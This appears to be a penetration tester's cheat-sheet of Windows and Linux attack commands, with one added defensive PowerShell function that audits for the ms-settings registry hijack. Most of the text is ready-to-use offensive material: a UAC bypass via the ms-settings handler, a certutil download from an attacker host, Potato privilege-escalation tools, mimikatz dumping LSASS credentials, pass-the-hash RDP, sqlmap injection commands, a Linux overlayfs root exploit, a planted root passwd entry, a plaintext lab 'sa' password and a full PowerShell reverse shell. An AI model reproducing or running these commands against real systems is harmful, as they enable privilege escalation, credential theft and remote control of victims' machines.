# PS
```powershell=1
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
```
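Defender-side check for the artefact the snippet above writes (added example, not part of the original notes; the function name and the `-Remediate` switch are my own): a per-user `ms-settings` handler under HKCU is normally absent, so its presence is worth flagging and, optionally, removing.

```powershell
# Added example: audit the per-user ms-settings protocol handler that the
# registry commands above create. HKCU:\Software\Classes\ms-settings does not
# exist on a clean profile, so any such key is a UAC-bypass artefact worth
# triaging. The function name and -Remediate switch are this example's own.
function Test-MsSettingsHandlerHijack {
    [CmdletBinding()]
    param([switch]$Remediate)   # remove the key after reporting it

    $root    = 'HKCU:\Software\Classes\ms-settings'
    $keyPath = Join-Path $root 'Shell\Open\command'
    $result  = [ordered]@{
        Present         = $false   # HKCU ms-settings key exists at all
        Command         = $null    # (default) value: what would be launched
        DelegateExecute = $null    # empty string is the signature of the hijack
        Suspicious      = $false
    }

    if (-not (Test-Path -Path $root)) {
        return [pscustomobject]$result
    }
    $result.Present    = $true
    $result.Suspicious = $true     # the key alone is enough to investigate

    if (Test-Path -Path $keyPath) {
        $props = Get-ItemProperty -Path $keyPath
        $result.Command = $props.'(default)'
        # Only report DelegateExecute if the value actually exists
        if ($props.PSObject.Properties.Name -contains 'DelegateExecute') {
            $result.DelegateExecute = $props.DelegateExecute
        }
    }

    Write-Warning ("Per-user ms-settings handler found: {0} -> '{1}'" -f
        $keyPath, $result.Command)

    if ($Remediate) {
        Remove-Item -Path $root -Recurse -Force
        Write-Verbose "Removed $root"
    }
    return [pscustomobject]$result
}

# Report only; add -Remediate -Verbose to also delete the key
Test-MsSettingsHandlerHijack | Format-List
```

Run it under each interactive user profile, since the key lives in HKCU and is invisible from an administrator's own hive.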
# download
```cmd=1
certutil -urlcache -f http://<ip>:<port>/<file> <target_path>
```
- https://github.com/BeichenDream/GodPotato/releases
# csc
```cmd=1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -out:EfsPotato.exe EfsPotato.cs
```
# PrivEsc
- https://github.com/BeichenDream/GodPotato/releases
# NTLM
- `reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f`
```cmd=1
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "token::elevate" "sekurlsa::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /patch" "exit"
```
- `mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /patch" "exit"`
- kali
```bash=1
xfreerdp +clipboard +home-drive /v:<IPADDRESS> /u:<USERNAME> /pth:<NTLM>
```
# read
- https://www.mandiant.com/resources/blog/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware
- https://jlajara.gitlab.io/Potatoes_Windows_Privesc
- https://github.com/itm4n/PrintSpoofer
# Vuln web 1
- sa:1qaz@WSX3edc~~
```sql=1
CREATE DATABASE [NPA_TEST_DB];
GO
USE [NPA_TEST_DB];
CREATE TABLE [TEST_TB]
(
    ID INT IDENTITY(1,1) NOT NULL PRIMARY KEY,
    DATA NVARCHAR(MAX) NULL
);
INSERT INTO [TEST_TB] (DATA) VALUES ('MEOW1'),('MEOW2');
SELECT * FROM [TEST_TB];
```
- https://drive.google.com/file/d/17EbrcQw5z7Ir7eZtX-ApeYs4lqdNlYNr/view?usp=sharing
- URL
  - `http://<target>/SQL_GET.aspx?id=1`
  - `http://<target>/SQL_POST.aspx`
  - `http://<target>/Upload.aspx`
# SQL
- `sqlmap -u "http://192.168.50.2/SQL_GET.aspx?id=1" --random-agent --dbms=MSSQL --batch`
- FoxyProxy Firefox plugin
- (capture the POST request with Burp) see https://blog.csdn.net/qq_33163046/article/details/128293938 then `sqlmap -r npa_post_test.txt -p "txt_Data" --random-agent --dbms=MSSQL --batch`
# lin privesc
- `unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"`
- `echo "pwn0:\$1\$ignite\$0q2pSX8sLvJPmEwIRPOko0:0:0:root:/root:/bin/bash" > hack`
# powershell
- `powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`